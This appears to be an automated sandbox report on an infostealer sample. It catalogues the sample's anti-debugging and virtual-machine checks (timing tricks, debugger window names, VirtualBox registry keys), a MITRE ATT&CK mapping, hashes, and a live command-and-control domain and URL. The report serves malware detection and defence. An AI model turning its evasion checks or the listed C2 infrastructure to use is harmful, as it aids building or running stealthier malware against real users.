Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72B07EC second address: 72B0807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250033 second address: 7250037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250601 second address: 7250607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250607 second address: 725060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 725060B second address: 7250627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250627 second address: 725062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 725062B second address: 7250631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250631 second address: 7250637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250637 second address: 725063B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 725063B second address: 725063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 725063F second address: 7250659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF1148823CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 7250659 second address: 725065F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 725065F second address: 72506A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1148823CAh 0x00000009 jmp 00007FF1148823D5h 0x0000000e popfd 0x0000000f mov ah, A1h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF1148823D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72506A1 second address: 72506A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72506A7 second address: 72506AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72506AB second address: 72506BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 popad 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Special instruction interceptor: First address: C2F9CF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Special instruction interceptor: First address: DDAFB2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Special instruction interceptor: First address: DFF865 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Special instruction interceptor: First address: DEBE60 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Special instruction interceptor: First address: E6B4A7 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe TID: 3856	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe TID: 4424	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe TID: 2076	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe TID: 2104	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe TID: 4408	Thread sleep time: -48024s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0050255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_0050255D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_005029FF

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Code function: 0_2_0050255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0050255D

Source: u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: u57m8aCdwb.exe, 00000000.00000003.2261137280.00000000019C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: u57m8aCdwb.exe	Binary or memory string: Hyper-V RAW
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: u57m8aCdwb.exe, 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: $hGfSo
Source: u57m8aCdwb.exe, 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: u57m8aCdwb.exe, 00000000.00000003.2642240904.0000000001A31000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2595407731.0000000001A39000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2644842033.0000000001A32000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641805041.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641842624.0000000001A21000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641368000.0000000001A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: u57m8aCdwb.exe, 00000000.00000003.2262835627.0000000006B21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File opened: NTICE
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File opened: SICE
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Process queried: DebugPort	Jump to behavior

Source: u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2A7oProgram Manager
Source: u57m8aCdwb.exe, 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: o2A7oProgram Manager

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic	TCP traffic: 192.168.2.5:49720 -> 185.121.15.192:80
Source: global traffic	TCP traffic: 192.168.2.5:49808 -> 185.121.15.192:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	741 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
u57m8aCdwb.exe	47%	ReversingLabs	Win32.Infostealer.Tinba
u57m8aCdwb.exe	100%	Avira	TR/Crypt.TPM.Gen
u57m8aCdwb.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.twentytk20ht.top	185.121.15.192	true	false		high
httpbin.org	98.85.100.80	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850	true		unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://curl.se/docs/hsts.html	u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
http://html4/loose.dtd	u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1	u57m8aCdwb.exe, 00000000.00000002.2644502123.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642615492.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642594319.00000000019B2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=	u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000003.2642240904.0000000001A31000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2644842033.0000000001A32000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641805041.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641842624.0000000001A21000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641368000.0000000001A13000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://httpbin.org/ipbefore	u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
https://curl.se/docs/http-cookies.html	u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
https://curl.se/docs/hsts.html#	u57m8aCdwb.exe	false	high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY	u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3	u57m8aCdwb.exe, 00000000.00000002.2644502123.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642615492.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642594319.00000000019B2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://curl.se/docs/alt-svc.html	u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850	u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	unknown
http://.css	u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high
http://.jpg	u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.twentytk20ht.top	Spain		207046	REDSERVICIOES	false
98.85.100.80	httpbin.org	United States		11351	TWC-11351-NORTHEASTUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578886
Start date and time:	2024-12-20 16:11:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	u57m8aCdwb.exe renamed because original name is a hash value
Original Sample Name:	0e6e12f9a9c017b4be17933aeacd543c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.190.147.2, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: u57m8aCdwb.exe

Simulations

Behavior and APIs

Time	Type	Description
10:13:29	API Interceptor	80x Sleep call for process: u57m8aCdwb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
98.85.100.80	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	SwJD3kiOwV.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	8dw8GAvqmM.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	9nYVfFos77.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	34.226.108.155
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	34.226.108.155
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	34.226.108.155
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	34.226.108.155
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	98.85.100.80
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	98.85.100.80
home.twentytk20ht.top	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TWC-11351-NORTHEASTUS	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	98.85.100.80
	arm5.elf	Get hash	malicious	Mirai	Browse	72.226.210.219
	hmips.elf	Get hash	malicious	Mirai	Browse	45.46.119.24
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	98.85.100.80
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	98.85.100.80
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	67.252.15.48
	la.bot.sparc.elf	Get hash	malicious	Mirai	Browse	98.94.131.188
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	98.85.100.80
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	50.75.56.140
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	98.85.100.80
REDSERVICIOES	TnIhoWAr57.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.121.15.192
	http://blacksaltys.com	Get hash	malicious	Unknown	Browse	185.121.15.137
	IGz.arm7.elf	Get hash	malicious	Mirai	Browse	185.189.98.142
	https://agradeahead.com/	Get hash	malicious	Unknown	Browse	185.121.15.137
	http://productfocus.com	Get hash	malicious	Unknown	Browse	185.121.15.137
	https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2e	Get hash	malicious	Unknown	Browse	185.121.15.137
	hax.mips.elf	Get hash	malicious	Mirai	Browse	185.226.106.144
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	178.19.44.184
	sora.arm.elf	Get hash	malicious	Mirai	Browse	185.226.106.195

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.985807815674753
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	u57m8aCdwb.exe
File size:	4'455'936 bytes
MD5:	0e6e12f9a9c017b4be17933aeacd543c
SHA1:	4c8fda6bdcbb813081a6d72bd6ad3ff430e17bee
SHA256:	738cdc197a8ece363679b55f005dccd3a943e4b333d69e946f80ff6c0445cd87
SHA512:	4050a406f72c3842fb207b40c77a153f96b863029e191cddae1ab1f59b3ba6a8f49a5de46e0a7159382fc101e1199a5c14d54f8eff29d55a246dfba4a232cf91
SSDEEP:	98304:o1Vz3hTT2pGpLHik0P3eV5e8aotVVYcU5uk9cZqUcjZJHsZ4275:eVz312peiZ+VaEzpUP9CsZJHsZt
TLSH:	C226331FEDCF06BDE863A2BB441BCB04F29A6A57348E9C9A16801494CC055D7EC64FED
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..........................@........D...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1071000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF114F6017Ah
paddusb mm0, qword ptr [ebx+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FF114F62175h
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
